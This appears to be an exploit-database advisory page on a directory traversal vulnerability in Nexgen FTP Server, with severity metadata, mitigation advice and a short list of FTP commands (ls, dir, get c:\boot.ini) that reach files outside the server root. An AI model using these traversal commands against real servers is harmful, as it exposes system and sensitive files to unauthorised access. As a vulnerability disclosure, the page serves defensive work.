header-logo
Suggest Exploit
vendor:
Nexgen FTP Server
by:
Unknown
7.5
CVSS
HIGH
Remote Directory Traversal
22
CWE
Product Name: Nexgen FTP Server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:nexgen:nexgen_ftp_server
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Nexgen FTP Server Remote Directory Traversal Vulnerability

The Nexgen FTP server is prone to a remote directory traversal vulnerability. This vulnerability allows authenticated users to bypass file request string sanitization and gain access to sensitive information on the server. An attacker can exploit this vulnerability to launch further attacks on the system.

Mitigation:

It is recommended to update the Nexgen FTP server to the latest version or apply any patches released by the vendor. Additionally, restrict access to the FTP server to trusted users only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9970/info

It has been reported that the Nexgen FTP server is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize file request strings from authenticated users.

Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.

ls c:\*.*
ls ..
ls \..ls /../
dir c:dir \..\*.*
get c:\"Exist File" [ c:\boot.ini ]
get \..\"Exist File"

Navigation

Suggest Exploit

Services By CQR